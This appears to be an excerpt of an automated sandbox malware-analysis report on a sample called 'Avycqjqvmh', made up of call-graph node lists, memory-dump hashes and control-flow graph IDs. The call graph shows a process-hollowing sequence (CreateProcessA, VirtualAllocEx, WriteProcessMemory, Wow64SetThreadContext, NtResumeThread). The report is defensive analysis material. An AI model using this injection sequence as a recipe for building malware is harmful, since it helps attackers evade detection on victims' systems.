54416->54431 54435 6580040 54416->54435 54439 658046e 54416->54439 54417 636f65b 54417->54369 54425 6580097 54423->54425 54424 6580211 54424->54417 54425->54424 54443 65813e0 54425->54443 54429 658003f 54427->54429 54428 6580211 54428->54417 54429->54428 54430 65813e0 10 API calls 54429->54430 54430->54429 54433 6580097 54431->54433 54432 6580211 54432->54417 54433->54432 54434 65813e0 10 API calls 54433->54434 54434->54433 54437 658006a 54435->54437 54436 6580211 54436->54417 54437->54436 54438 65813e0 10 API calls 54437->54438 54438->54437 54441 6580097 54439->54441 54440 6580211 54440->54417 54441->54440 54442 65813e0 10 API calls 54441->54442 54442->54441 54444 6581405 54443->54444 54448 658142f 54444->54448 54452 6581440 54444->54452 54445 6581427 54445->54425 54450 6581440 54448->54450 54449 6581646 54449->54445 54450->54449 54456 6581be0 54450->54456 54454 658146d 54452->54454 54453 6581646 54453->54445 54454->54453 54455 6581be0 10 API calls 54454->54455 54455->54454 54457 6581c05 54456->54457 54471 65823ef 54457->54471 54475 658231e 54457->54475 54480 65824fc 54457->54480 54485 6582b99 54457->54485 54491 65822a9 54457->54491 54496 6582989 54457->54496 54501 6582035 54457->54501 54506 6582173 54457->54506 54511 6581ed1 54457->54511 54516 6582090 54457->54516 54521 6582450 54457->54521 54525 6581eef 54457->54525 54458 6581c27 54458->54450 54530 65848f0 54471->54530 54535 65848e1 54471->54535 54472 658240e 54476 6582336 54475->54476 54548 6365f40 54476->54548 54552 6365f38 54476->54552 54477 6581db3 54477->54458 54481 6582518 54480->54481 54556 6584978 54481->54556 54561 6584988 54481->54561 54482 6582540 54486 65824fb 54485->54486 54487 6582ba6 54485->54487 54489 6584978 2 API calls 54486->54489 54490 6584988 2 API calls 54486->54490 54488 6582540 54489->54488 54490->54488 54492 6582173 54491->54492 54493 6581db3 54491->54493 54494 6584978 2 API calls 54492->54494 54495 6584988 2 API calls 54492->54495 54494->54493 54495->54493 54497 6582993 54496->54497 54574 6366560 54497->54574 54578 6366558 54497->54578 54498 6581db3 54502 658204d 54501->54502 54582 65831f8 54502->54582 54586 65831e8 54502->54586 54503 6582065 54507 658217d 54506->54507 54509 6584978 2 API calls 54507->54509 54510 6584988 2 API calls 54507->54510 54508 6581db3 54509->54508 54510->54508 54512 65829af 54511->54512 54513 6581db3 54511->54513 54514 6366560 NtResumeThread 54512->54514 54515 6366558 NtResumeThread 54512->54515 54514->54513 54515->54513 54517 65820ad 54516->54517 54519 6365f40 WriteProcessMemory 54517->54519 54520 6365f38 WriteProcessMemory 54517->54520 54518 6581db3 54519->54518 54520->54518 54523 6365880 Wow64SetThreadContext 54521->54523 54524 6365878 Wow64SetThreadContext 54521->54524 54522 6581db3 54523->54522 54524->54522 54526 6581f0c 54525->54526 54528 6365f40 WriteProcessMemory 54526->54528 54529 6365f38 WriteProcessMemory 54526->54529 54527 6581db3 54527->54458 54528->54527 54529->54527 54531 6584905 54530->54531 54540 6365880 54531->54540 54544 6365878 54531->54544 54532 658491e 54532->54472 54536 65848f0 54535->54536 54538 6365880 Wow64SetThreadContext 54536->54538 54539 6365878 Wow64SetThreadContext 54536->54539 54537 658491e 54537->54472 54538->54537 54539->54537 54541 63658c9 Wow64SetThreadContext 54540->54541 54543 6365941 54541->54543 54543->54532 54545 6365880 Wow64SetThreadContext 54544->54545 54547 6365941 54545->54547 54547->54532 54549 6365f8c WriteProcessMemory 54548->54549 54551 6366025 54549->54551 54551->54477 54553 6365f40 WriteProcessMemory 54552->54553 54555 6366025 54553->54555 54555->54477 54557 6584988 54556->54557 54566 6365dd9 54557->54566 54570 6365de0 54557->54570 54558 65849bf 54558->54482 54562 658499d 54561->54562 54564 6365de0 VirtualAllocEx 54562->54564 54565 6365dd9 VirtualAllocEx 54562->54565 54563 65849bf 54563->54482 54564->54563 54565->54563 54567 6365e24 VirtualAllocEx 54566->54567 54569 6365e9c 54567->54569 54569->54558 54571 6365e24 VirtualAllocEx 54570->54571 54573 6365e9c 54571->54573 54573->54558 54575 63665a9 NtResumeThread 54574->54575 54577 6366600 54575->54577 54577->54498 54579 63665a9 NtResumeThread 54578->54579 54581 6366600 54579->54581 54581->54498 54583 658320f 54582->54583 54584 6583231 54583->54584 54590 658373d 54583->54590 54584->54503 54587 65831f8 54586->54587 54588 6583231 54587->54588 54589 658373d 2 API calls 54587->54589 54588->54503 54589->54588 54591 6583746 54590->54591 54593 63654bc CreateProcessA 54591->54593 54594 63654c8 CreateProcessA 54591->54594 54592 6583812 54593->54592 54594->54592 54596 63682ad 54595->54596 54609 636840e 54596->54609 54614 63682c8 54596->54614 54619 63682d8 54596->54619 54624 636877b 54596->54624 54597 63682c3 54597->54373 54603 6368298 54602->54603 54605 636840e 2 API calls 54603->54605 54606 636877b 2 API calls 54603->54606 54607 63682d8 2 API calls 54603->54607 54608 63682c8 2 API calls 54603->54608 54604 63682c3 54604->54373 54605->54604 54606->54604 54607->54604 54608->54604 54610 6368414 54609->54610 54611 636843a 54610->54611 54612 6366830 VirtualProtect 54610->54612 54613 6366838 VirtualProtect 54610->54613 54611->54597 54612->54610 54613->54610 54616 63682d8 54614->54616 54615 6368369 54615->54597 54616->54615 54617 6366830 VirtualProtect 54616->54617 54618 6366838 VirtualProtect 54616->54618 54617->54616 54618->54616 54621 6368305 54619->54621 54620 6368369 54620->54597 54621->54620 54622 6366830 VirtualProtect 54621->54622 54623 6366838 VirtualProtect 54621->54623 54622->54621 54623->54621 54626 6368357 54624->54626 54625 6368369 54625->54597 54626->54625 54627 6366830 VirtualProtect 54626->54627 54628 6366838 VirtualProtect 54626->54628 54627->54626 54628->54626 54630 61ec57d 54629->54630 54634 61ec510 2 API calls 54630->54634 54635 61ec520 2 API calls 54630->54635 54660 61ec598 54630->54660 54665 61ec5a8 54630->54665 54631 61ec593 54631->54393 54634->54631 54635->54631 54637 61ec532 54636->54637 54637->54393 54638 61ec567 54637->54638 54641 61ec59f 54637->54641 54644 61ec598 2 API calls 54638->54644 54645 61ec5a8 2 API calls 54638->54645 54646 61ec510 2 API calls 54638->54646 54647 61ec520 2 API calls 54638->54647 54639 61ec593 54639->54393 54640 61ec706 54640->54393 54641->54640 54642 6366830 VirtualProtect 54641->54642 54643 6366838 VirtualProtect 54641->54643 54642->54641 54643->54641 54644->54639 54645->54639 54646->54639 54647->54639 54650 61ec51f 54648->54650 54649 61ec59f 54653 61ec706 54649->54653 54654 6366830 VirtualProtect 54649->54654 54655 6366838 VirtualProtect 54649->54655 54650->54393 54650->54649 54651 61ec567 54650->54651 54656 61ec598 2 API calls 54651->54656 54657 61ec5a8 2 API calls 54651->54657 54658 61ec510 2 API calls 54651->54658 54659 61ec520 2 API calls 54651->54659 54652 61ec593 54652->54393 54653->54393 54654->54649 54655->54649 54656->54652 54657->54652 54658->54652 54659->54652 54661 61ec59f 54660->54661 54662 61ec706 54661->54662 54663 6366830 VirtualProtect 54661->54663 54664 6366838 VirtualProtect 54661->54664 54662->54631 54663->54661 54664->54661 54667 61ec5d2 54665->54667 54666 61ec706 54666->54631 54667->54666 54668 6366830 VirtualProtect 54667->54668 54669 6366838 VirtualProtect 54667->54669 54668->54667 54669->54667 54670 11cd030 54671 11cd048 54670->54671 54672 11cd0a3 54671->54672 54674 63dde70 54671->54674 54675 63ddec9 54674->54675 54678 63de400 54675->54678 54676 63ddefe 54679 63de42d 54678->54679 54680 63dd2a8 VirtualProtect 54679->54680 54682 63de5c3 54679->54682 54681 63de5b4 54680->54681 54681->54676 54682->54676 54683 63de950 54684 63de994 VirtualAlloc 54683->54684 54686 63dea01 54684->54686
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 2
                                                          • API String ID: 0-450215437
                                                          • Opcode ID: 3605561e66d3ef8a0de7ceaa1e5b91c0f25859dfae8081544b2a761f882705b2
                                                          • Instruction ID: abfa9a1eab1522fdac2e5cbbd08debfeace04f383601dd774c2262c0fba8df82
                                                          • Opcode Fuzzy Hash: 3605561e66d3ef8a0de7ceaa1e5b91c0f25859dfae8081544b2a761f882705b2
                                                          • Instruction Fuzzy Hash: 56C2B0B4E112298FDB64DF69C884BD9BBB6BF89300F1081E9D509AB355DB709E85CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 21e9db04faad94222b0e14189168a518adeb9c02d038d3ae27be988a853a3dd2
                                                          • Instruction ID: 99291a895cfa4c4d14f3754f13cc4bb1bbcbfb99c9596c9ef6291e275b9b7d4f
                                                          • Opcode Fuzzy Hash: 21e9db04faad94222b0e14189168a518adeb9c02d038d3ae27be988a853a3dd2
                                                          • Instruction Fuzzy Hash: F2B13B70E22218CFEB54CFA9D884BDDBBF2BF89300F509469D809A7696DB705985CF41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te^q
                                                          • API String ID: 0-671973202
                                                          • Opcode ID: 5005d668682000911f31439bcf7d23708d8bd4b15580a8921c423b31f77e58a4
                                                          • Instruction ID: 607448c75883f854b5dc8ec54ab6721cb9bef63688bb72a79ee69c7afaf120f8
                                                          • Opcode Fuzzy Hash: 5005d668682000911f31439bcf7d23708d8bd4b15580a8921c423b31f77e58a4
                                                          • Instruction Fuzzy Hash: E0B13974E22218CFEB54CFA9D884B9DBBF2BF89300F108469D809A7796DB705985CF01
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ddb8b1bbf5febe8e73b4bb24528099024ed96d254e8c72b5822c35bfd7a9837c
                                                          • Instruction ID: 4f73966b9a4cb4838b79c5b8209c2af55dda94f783082644af4877517f937f52
                                                          • Opcode Fuzzy Hash: ddb8b1bbf5febe8e73b4bb24528099024ed96d254e8c72b5822c35bfd7a9837c
                                                          • Instruction Fuzzy Hash: 1232C574A152298FDB65DF68C888B99BBB5FF48300F1081E9E94DA7351DB30AE81CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a35c06e26c4201af01f312325332b379ae29befcef59c909d2179b3f50cc4b4
                                                          • Instruction ID: d9380c7d1cd8ecf28a2127210f6847107a3daaf10f5616801ee9ea1468693f16
                                                          • Opcode Fuzzy Hash: 3a35c06e26c4201af01f312325332b379ae29befcef59c909d2179b3f50cc4b4
                                                          • Instruction Fuzzy Hash: 0FE11474E00629CFDBA4EFA9D884BEEBBF2BB89304F108169D459B7650C7345986CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97f14aa69e442df38e7611c4812bedf500654e1fb317881450d9b7ce4f1e520e
                                                          • Instruction ID: f4aea74e8a70b011d839cf941ad3810d7024596c3e186eff7080d3332d62f1bf
                                                          • Opcode Fuzzy Hash: 97f14aa69e442df38e7611c4812bedf500654e1fb317881450d9b7ce4f1e520e
                                                          • Instruction Fuzzy Hash: 75E10274E00629CFDBA4EFA9D884BEEBBF2BB88314F108169D459B7650C7345986CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fe759397a5887cd73edf39619f0af274b463dd24140850b8b4438a022e51a5a
                                                          • Instruction ID: 3781b0f53b3656bd9af0bd4004106f49605a17046e27a2e30754dca08d90e216
                                                          • Opcode Fuzzy Hash: 2fe759397a5887cd73edf39619f0af274b463dd24140850b8b4438a022e51a5a
                                                          • Instruction Fuzzy Hash: 48C12974E01218CFEB94EF69D884B9DBBF2BB49300F1091A9D419B7695DB305989CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34d7a9019a1fcfa2ed985ce0ef973cd47577da53aa3b11aecd55a593becd1e75
                                                          • Instruction ID: b0ca79e2ac81beff58e70048982af564e1401109d18ca1024c01063e09e052cb
                                                          • Opcode Fuzzy Hash: 34d7a9019a1fcfa2ed985ce0ef973cd47577da53aa3b11aecd55a593becd1e75
                                                          • Instruction Fuzzy Hash: FCC11970E01218CFEB94EF69D884B9DBBF6BF89300F1091A9D419B7695DB305989CF50
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf2c6e56152d8c9f28b29dc8b7433ee95ae73a7bbb52031ee0def6caa4cf7b7e
                                                          • Instruction ID: e797120b2e4fbe4a4002d05c452a316875c089a697da7424c0fd6916165d2a8b
                                                          • Opcode Fuzzy Hash: bf2c6e56152d8c9f28b29dc8b7433ee95ae73a7bbb52031ee0def6caa4cf7b7e
                                                          • Instruction Fuzzy Hash: 1A513DB1E156598BEB19CF6BCC4469AFBF7AFC5300F18C0AAD808AB255DB340985CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 854 620ee48-620ee70 856 620ee72-620eeb9 854->856 857 620eebe-620eecc 854->857 900 620f315-620f31c 856->900 858 620eedb 857->858 859 620eece-620eed9 857->859 860 620eedd-620eee4 858->860 859->860 863 620eeea-620eeee 860->863 864 620efcd-620efd1 860->864 867 620eef4-620eef8 863->867 868 620f31d-620f345 863->868 865 620efd3-620efe2 864->865 866 620f027-620f031 864->866 880 620efe6-620efeb 865->880 870 620f033-620f042 866->870 871 620f06a-620f090 866->871 872 620ef0a-620ef68 867->872 873 620eefa-620ef04 867->873 876 620f34c-620f376 868->876 884 620f048-620f065 870->884 885 620f37e-620f394 870->885 896 620f092-620f09b 871->896 897 620f09d 871->897 909 620f3db-620f405 872->909 910 620ef6e-620efc8 872->910 873->872 873->876 876->885 886 620efe4 880->886 887 620efed-620f022 call 620e910 880->887 884->900 911 620f39c-620f3d4 885->911 886->880 887->900 899 620f09f-620f0c7 896->899 897->899 915 620f198-620f19c 899->915 916 620f0cd-620f0e6 899->916 921 620f407-620f40d 909->921 922 620f40f-620f415 909->922 910->900 911->909 919 620f216-620f220 915->919 920 620f19e-620f1b7 915->920 916->915 941 620f0ec-620f0fb 916->941 924 620f222-620f22c 919->924 925 620f27d-620f286 919->925 920->919 946 620f1b9-620f1c8 920->946 921->922 928 620f416-620f453 921->928 939 620f232-620f244 924->939 940 620f22e-620f230 924->940 930 620f288-620f2b6 925->930 931 620f2be-620f30b 925->931 930->931 950 620f313 931->950 947 620f246-620f248 939->947 940->947 959 620f113-620f128 941->959 960 620f0fd-620f103 941->960 964 620f1e0-620f1eb 946->964 965 620f1ca-620f1d0 946->965 948 620f276-620f27b 947->948 949 620f24a-620f24e 947->949 948->924 948->925 955 620f250-620f269 949->955 956 620f26c-620f26f 949->956 950->900 955->956 956->948 962 620f12a-620f156 959->962 963 620f15c-620f165 959->963 966 620f105 960->966 967 620f107-620f109 960->967 962->911 962->963 963->909 971 620f16b-620f192 963->971 964->909 974 620f1f1-620f214 964->974 972 620f1d2 965->972 973 620f1d4-620f1d6 965->973 966->959 967->959 971->915 971->941 972->964 973->964 974->919 974->946
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Hbq$Hbq$Hbq
                                                          • API String ID: 0-2297679979
                                                          • Opcode ID: a883d2b8da4bc80d29e8ebbbe7d03d2d912d023228e7a4d32b610f1aa86209ae
                                                          • Instruction ID: 5ac47434e67c159f93e838a66be80a665701cedc2c857ba5e2fa1f8ffb800015
                                                          • Opcode Fuzzy Hash: a883d2b8da4bc80d29e8ebbbe7d03d2d912d023228e7a4d32b610f1aa86209ae
                                                          • Instruction Fuzzy Hash: D1128E31A103059FDBA8DFA5D9846AEB7F6FF88300F14852DD9069B791DB31AC46CB90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1958 620e4f8-620e50a 1959 620e534-620e538 1958->1959 1960 620e50c-620e52d 1958->1960 1961 620e544-620e553 1959->1961 1962 620e53a-620e53c 1959->1962 1960->1959 1963 620e555 1961->1963 1964 620e55f-620e58b 1961->1964 1962->1961 1963->1964 1968 620e591-620e597 1964->1968 1969 620e7b8-620e7c0 1964->1969 1970 620e669-620e66d 1968->1970 1971 620e59d-620e5a3 1968->1971 1980 620e7c2-620e7ff 1969->1980 1981 620e76e-620e781 1969->1981 1975 620e690-620e699 1970->1975 1976 620e66f-620e678 1970->1976 1971->1969 1974 620e5a9-620e5b6 1971->1974 1982 620e648-620e651 1974->1982 1983 620e5bc-620e5c5 1974->1983 1978 620e69b-620e6bb 1975->1978 1979 620e6be-620e6c1 1975->1979 1976->1969 1977 620e67e-620e68e 1976->1977 1984 620e6c4-620e6ca 1977->1984 1978->1979 1979->1984 2008 620e801 1980->2008 2009 620e815-620e821 1980->2009 1994 620e783 1981->1994 1995 620e78d-620e7a6 1981->1995 1982->1969 1986 620e657-620e663 1982->1986 1983->1969 1985 620e5cb-620e5e3 1983->1985 1984->1969 1989 620e6d0-620e6e3 1984->1989 1991 620e5e5 1985->1991 1992 620e5ef-620e601 1985->1992 1986->1970 1986->1971 1989->1969 1993 620e6e9-620e6f9 1989->1993 1991->1992 1992->1982 2000 620e603-620e609 1992->2000 1993->1969 1999 620e6ff-620e70c 1993->1999 1994->1995 2015 620e7ae-620e7b5 1995->2015 1999->1969 2001 620e712-620e727 1999->2001 2003 620e615-620e61b 2000->2003 2004 620e60b 2000->2004 2001->1969 2014 620e72d-620e750 2001->2014 2003->1969 2007 620e621-620e645 2003->2007 2004->2003 2013 620e804-620e806 2008->2013 2011 620e823 2009->2011 2012 620e82d-620e849 2009->2012 2011->2012 2017 620e808-620e813 2013->2017 2018 620e84a-620e877 2013->2018 2014->1969 2021 620e752-620e75d 2014->2021 2017->2009 2017->2013 2027 620e879-620e87f 2018->2027 2028 620e88f-620e891 2018->2028 2021->2015 2023 620e75f-620e769 2021->2023 2023->2015 2029 620e76b 2023->2029 2030 620e881 2027->2030 2031 620e883-620e885 2027->2031 2045 620e893 call 620e900 2028->2045 2046 620e893 call 620e910 2028->2046 2047 620e893 call 620fad0 2028->2047 2029->1981 2030->2028 2031->2028 2032 620e899-620e89d 2033 620e8e8-620e8f8 2032->2033 2034 620e89f-620e8b6 2032->2034 2034->2033 2038 620e8b8-620e8c2 2034->2038 2040 620e8c4-620e8d3 2038->2040 2041 620e8d5-620e8e5 2038->2041 2040->2041 2045->2032 2046->2032 2047->2032
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$d
                                                          • API String ID: 0-3334038649
                                                          • Opcode ID: 1fab09eb780d981c9d567ced93ee646245e0df09bf84a8ee14345bdbc7c46324
                                                          • Instruction ID: 87cf92b6a59405a721affc2d4f83d27f505e32b0d995892d445c358758612e07
                                                          • Opcode Fuzzy Hash: 1fab09eb780d981c9d567ced93ee646245e0df09bf84a8ee14345bdbc7c46324
                                                          • Instruction Fuzzy Hash: D0D181347106068FDB58DF68C48096AB7F6FF88310B16C959D95A9B3A2DB30FC81CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$-
                                                          • API String ID: 0-1978720458
                                                          • Opcode ID: d5932f68453323892b04898a772969cbd19dc5125a5f9ed0b09426245b25c2c0
                                                          • Instruction ID: d718ed572d1d0b1263cead22f26b5640367b0f500a218901e69c5c975e8925e8
                                                          • Opcode Fuzzy Hash: d5932f68453323892b04898a772969cbd19dc5125a5f9ed0b09426245b25c2c0
                                                          • Instruction Fuzzy Hash: 8721B374D0122ACFEB60DF64C988BA8BBB1BB48300F1085D9D51AA7711D7315EC2DF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq
                                                          • API String ID: 0-1911830065
                                                          • Opcode ID: 74a8c82005ae10f65b90c3559fb05cc2726807a792601c7cd84107f646623887
                                                          • Instruction ID: 6049696eede2b0c90425b4e96116d5af7c6692f88859ffe81074c061845b72ab
                                                          • Opcode Fuzzy Hash: 74a8c82005ae10f65b90c3559fb05cc2726807a792601c7cd84107f646623887
                                                          • Instruction Fuzzy Hash: 1251FC74D21208DFDB44DFA5E488AADBBF5FF88314F10806AE815A7361DB74AA45CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJcq
                                                          • API String ID: 0-1911830065
                                                          • Opcode ID: 8a5e0ce3d7547f85a697c638c6f0816a577e79d0056857977f36c7246ceaba9b
                                                          • Instruction ID: 2dba4773600465db6dd1eeca28222842bbdeab925d04f5905efcb9745cf193cb
                                                          • Opcode Fuzzy Hash: 8a5e0ce3d7547f85a697c638c6f0816a577e79d0056857977f36c7246ceaba9b
                                                          • Instruction Fuzzy Hash: 9551D674D21208DFDB44DFA9E588AADBBF5FF88310F10806AE815A7361DB74AA45CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1885449088.0000000006200000.00000040.00000800.00020000.00000000.sdmp, Offset: 06200000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6200000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q
                                                          • API String ID: 0-1614139903
                                                          • Opcode ID: ec80c3661f8b97155afaafe921c48121d9daf4c9acaa1e50f09199518d4f349c
                                                          • Instruction ID: 758315a873a720f50e79871cd05e00c6af1d411b6f29bbc3907729691e79a859
                                                          • Opcode Fuzzy Hash: ec80c3661f8b97155afaafe921c48121d9daf4c9acaa1e50f09199518d4f349c
                                                          • Instruction Fuzzy Hash: B831C035A102049FDF599FA4C85499D7BB7EF8C360F0540A9EE069B3A6CA31DC12CB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :
                                                          • API String ID: 0-336475711
                                                          • Opcode ID: e7c39b0c854b69e452978549f79d4ae0ad58f7fa858228a7131bfc4804011605
                                                          • Instruction ID: 6a2746ab1f35a28286041044604e3b260faa313a160f221b798536b154c9afc7
                                                          • Opcode Fuzzy Hash: e7c39b0c854b69e452978549f79d4ae0ad58f7fa858228a7131bfc4804011605
                                                          • Instruction Fuzzy Hash: 1221BB70E01229DFEB65DF24C994BDCBBB1BB48304F508699D50AA7640CB715E85EF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: E
                                                          • API String ID: 0-3568589458
                                                          • Opcode ID: 71bb033b5fc3bf632264a64619c75d461b1e9054cf261efd9ff7b8275820a1f7
                                                          • Instruction ID: 999f78eb22bf3440e6bbb2dde43ae2a99901b821d81650ac9fa38595b308b5a5
                                                          • Opcode Fuzzy Hash: 71bb033b5fc3bf632264a64619c75d461b1e9054cf261efd9ff7b8275820a1f7
                                                          • Instruction Fuzzy Hash: B921CA70D01668CFEBA0DF55CD88BD9BBB1BB49305F1082D9D80AAA350C7765AC6CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :
                                                          • API String ID: 0-336475711
                                                          • Opcode ID: a317de08e0cbfb15b8f35d6ae29853f9b9a39afd8aa1c2d2ae0c30dda2374dc8
                                                          • Instruction ID: 1647d390731acbe3200cebe78f8cd9e61c1d9dd54ab018929ce03ec59e43234f
                                                          • Opcode Fuzzy Hash: a317de08e0cbfb15b8f35d6ae29853f9b9a39afd8aa1c2d2ae0c30dda2374dc8
                                                          • Instruction Fuzzy Hash: 6011AC74A01229EFDB69DF64D994BDCBBB1BB08300F50859AD50AA7250CB316E85DF00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: f19b406295c03db711f0c4cce093d165c33c34119009e2491f7545447d0e8354
                                                          • Instruction ID: 3a4464b1723ded5fa230904eae90c46a231b24edc5fe8a8e57fff2410167d43a
                                                          • Opcode Fuzzy Hash: f19b406295c03db711f0c4cce093d165c33c34119009e2491f7545447d0e8354
                                                          • Instruction Fuzzy Hash: 4C01C070904218CFEBA0DF15C984BD8B7B5BB49304F5085D9C41EA7640C331AAC6CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1886224544.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6580000_Avycqjqvmh.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: a1cf64220bfcc43bd344ab3bd5776076f7f7ef935dd6d925baf61c0c4b6d3ba6
                                                          • Instruction ID: e93ee8e7e3da8faf73b7130854f8a5020fd84ad6ee2ed453c40bc425abdd9af6
                                                          • Opcode Fuzzy Hash: a1cf64220bfcc43bd344ab3bd5776076f7f7ef935dd6d925baf61c0c4b6d3ba6
                                                          • Instruction Fuzzy Hash: A8F0E23490122ACFDBA4DF14C984BE8BBF1BB08318F1485E9C41AA3650C3369AC6DF40
                                                          Strings
                                                          Memory Dump Source
